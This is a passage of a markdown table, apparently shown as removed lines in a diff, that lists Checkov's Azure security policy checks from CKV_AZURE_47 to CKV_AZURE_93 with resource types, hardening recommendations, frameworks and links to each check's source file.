-| 1686 | CKV_AZURE_47             | resource                         | azurerm_mariadb_server                                                                           | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Terraform               | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py)                                                             |
-| 1687 | CKV_AZURE_48             | resource                         | azurerm_mariadb_server                                                                           | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | Terraform               | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py)                                                               |
-| 1688 | CKV_AZURE_49             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | arm                     | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                                       |
-| 1689 | CKV_AZURE_49             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Bicep                   | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                                       |
-| 1690 | CKV_AZURE_49             | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Terraform               | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py)                                                                           |
-| 1691 | CKV_AZURE_50             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | arm                     | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                                   |
-| 1692 | CKV_AZURE_50             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Bicep                   | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                                   |
-| 1693 | CKV_AZURE_50             | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform               | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                       |
-| 1694 | CKV_AZURE_50             | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform               | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                       |
-| 1695 | CKV_AZURE_52             | resource                         | azurerm_mssql_server                                                                             | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | Terraform               | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py)                                                                     |
-| 1696 | CKV_AZURE_53             | resource                         | azurerm_mysql_server                                                                             | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | Terraform               | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py)                                                                   |
-| 1697 | CKV_AZURE_54             | resource                         | azurerm_mysql_server                                                                             | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | Terraform               | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py)                                                                     |
-| 1698 | CKV_AZURE_55             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Servers                                                                                                                                                      | Terraform               | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py)                                                                         |
-| 1699 | CKV_AZURE_56             | resource                         | azurerm_function_app                                                                             | Ensure that function apps enables Authentication                                                                                                                                                         | Terraform               | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py)                                                     |
-| 1700 | CKV_AZURE_57             | resource                         | azurerm_app_service                                                                              | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1701 | CKV_AZURE_57             | resource                         | azurerm_linux_web_app                                                                            | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1702 | CKV_AZURE_57             | resource                         | azurerm_windows_web_app                                                                          | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                         |
-| 1703 | CKV_AZURE_58             | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | arm                     | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                       |
-| 1704 | CKV_AZURE_58             | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Bicep                   | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                       |
-| 1705 | CKV_AZURE_58             | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Terraform               | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                           |
-| 1706 | CKV_AZURE_59             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage accounts disallow public access                                                                                                                                                      | arm                     | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                               |
-| 1707 | CKV_AZURE_59             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage accounts disallow public access                                                                                                                                                      | Bicep                   | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                               |
-| 1708 | CKV_AZURE_59             | resource                         | azurerm_storage_account                                                                          | Ensure that Storage accounts disallow public access                                                                                                                                                      | Terraform               | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py)                                                   |
-| 1709 | CKV_AZURE_61             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for App Service                                                                                                                                                  | Terraform               | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py)                                                                 |
-| 1710 | CKV_AZURE_62             | resource                         | azurerm_function_app                                                                             | Ensure function apps are not accessible from all regions                                                                                                                                                 | Terraform               | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py)                                                                       |
-| 1711 | CKV_AZURE_63             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables HTTP logging                                                                                                                                                             | arm                     | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                                         |
-| 1712 | CKV_AZURE_63             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables HTTP logging                                                                                                                                                             | Bicep                   | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                                         |
-| 1713 | CKV_AZURE_63             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1714 | CKV_AZURE_63             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1715 | CKV_AZURE_63             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                             |
-| 1716 | CKV_AZURE_64             | resource                         | azurerm_storage_sync                                                                             | Ensure that Azure File Sync disables public network access                                                                                                                                               | Terraform               | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py)                                                       |
-| 1717 | CKV_AZURE_65             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables detailed error messages                                                                                                                                                  | arm                     | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                                     |
-| 1718 | CKV_AZURE_65             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables detailed error messages                                                                                                                                                  | Bicep                   | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                                     |
-| 1719 | CKV_AZURE_65             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1720 | CKV_AZURE_65             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1721 | CKV_AZURE_65             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                         |
-| 1722 | CKV_AZURE_66             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables failed request tracing                                                                                                                                                   | arm                     | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                                       |
-| 1723 | CKV_AZURE_66             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables failed request tracing                                                                                                                                                   | Bicep                   | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                                       |
-| 1724 | CKV_AZURE_66             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1725 | CKV_AZURE_66             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1726 | CKV_AZURE_66             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                           |
-| 1727 | CKV_AZURE_67             | resource                         | azurerm_function_app                                                                             | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform               | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                             |
-| 1728 | CKV_AZURE_67             | resource                         | azurerm_function_app_slot                                                                        | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform               | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                             |
-| 1729 | CKV_AZURE_68             | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server disables public network access                                                                                                                                             | Terraform               | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py)                                             |
-| 1730 | CKV_AZURE_69             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Azure SQL database servers                                                                                                                                   | Terraform               | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py)                                                                   |
-| 1731 | CKV_AZURE_70             | resource                         | azurerm_function_app                                                                             | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1732 | CKV_AZURE_70             | resource                         | azurerm_function_app_slot                                                                        | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1733 | CKV_AZURE_70             | resource                         | azurerm_linux_function_app                                                                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1734 | CKV_AZURE_70             | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1735 | CKV_AZURE_70             | resource                         | azurerm_windows_function_app                                                                     | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1736 | CKV_AZURE_70             | resource                         | azurerm_windows_function_app_slot                                                                | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1737 | CKV_AZURE_71             | resource                         | azurerm_app_service                                                                              | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1738 | CKV_AZURE_71             | resource                         | azurerm_linux_web_app                                                                            | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1739 | CKV_AZURE_71             | resource                         | azurerm_windows_web_app                                                                          | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1740 | CKV_AZURE_72             | resource                         | azurerm_app_service                                                                              | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1741 | CKV_AZURE_72             | resource                         | azurerm_linux_web_app                                                                            | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1742 | CKV_AZURE_72             | resource                         | azurerm_windows_web_app                                                                          | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1743 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_bool                                                                 | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1744 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_datetime                                                             | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1745 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_int                                                                  | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1746 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_string                                                               | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1747 | CKV_AZURE_74             | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | Terraform               | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py)                                                         |
-| 1748 | CKV_AZURE_75             | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | Terraform               | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py)                                     |
-| 1749 | CKV_AZURE_76             | resource                         | azurerm_batch_account                                                                            | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | Terraform               | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py)                                       |
-| 1750 | CKV_AZURE_77             | resource                         | azurerm_network_security_group                                                                   | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform               | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                 |
-| 1751 | CKV_AZURE_77             | resource                         | azurerm_network_security_rule                                                                    | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform               | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                 |
-| 1752 | CKV_AZURE_78             | resource                         | azurerm_app_service                                                                              | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1753 | CKV_AZURE_78             | resource                         | azurerm_linux_web_app                                                                            | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1754 | CKV_AZURE_78             | resource                         | azurerm_windows_web_app                                                                          | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1755 | CKV_AZURE_79             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | Terraform               | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py)                                                               |
-| 1756 | CKV_AZURE_80             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | arm                     | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                                 |
-| 1757 | CKV_AZURE_80             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Bicep                   | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                                 |
-| 1758 | CKV_AZURE_80             | resource                         | azurerm_app_service                                                                              | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform               | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                     |
-| 1759 | CKV_AZURE_80             | resource                         | azurerm_windows_web_app                                                                          | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform               | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                     |
-| 1760 | CKV_AZURE_81             | resource                         | azurerm_app_service                                                                              | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | Terraform               | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py)                                                                             |
-| 1761 | CKV_AZURE_82             | resource                         | azurerm_app_service                                                                              | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | Terraform               | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py)                                                                       |
-| 1762 | CKV_AZURE_83             | resource                         | azurerm_app_service                                                                              | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | Terraform               | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py)                                                                           |
-| 1763 | CKV_AZURE_84             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | Terraform               | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py)                                                                         |
-| 1764 | CKV_AZURE_85             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | Terraform               | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py)                                                                   |
-| 1765 | CKV_AZURE_86             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Container Registries                                                                                                                                         | Terraform               | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py)                                                     |
-| 1766 | CKV_AZURE_87             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | Terraform               | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py)                                                                     |
-| 1767 | CKV_AZURE_88             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that app services use Azure Files                                                                                                                                                                 | arm                     | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                                 |
-| 1768 | CKV_AZURE_88             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that app services use Azure Files                                                                                                                                                                 | Bicep                   | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                                 |
-| 1769 | CKV_AZURE_88             | resource                         | azurerm_app_service                                                                              | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1770 | CKV_AZURE_88             | resource                         | azurerm_linux_web_app                                                                            | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1771 | CKV_AZURE_88             | resource                         | azurerm_windows_web_app                                                                          | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1772 | CKV_AZURE_89             | resource                         | Microsoft.Cache/redis                                                                            | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | arm                     | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                                         |
-| 1773 | CKV_AZURE_89             | resource                         | Microsoft.Cache/redis                                                                            | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Bicep                   | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                                         |
-| 1774 | CKV_AZURE_89             | resource                         | azurerm_redis_cache                                                                              | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Terraform               | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py)                                             |
-| 1775 | CKV_AZURE_91             | resource                         | azurerm_redis_cache                                                                              | Ensure that only SSL are enabled for Cache for Redis                                                                                                                                                     | Terraform               | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py)                                                                 |
-| 1776 | CKV_AZURE_92             | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform               | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                       |
-| 1777 | CKV_AZURE_92             | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform               | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                       |
-| 1778 | CKV_AZURE_93             | resource                         | Microsoft.Compute/disks                                                                          | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | arm                     | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                                       |
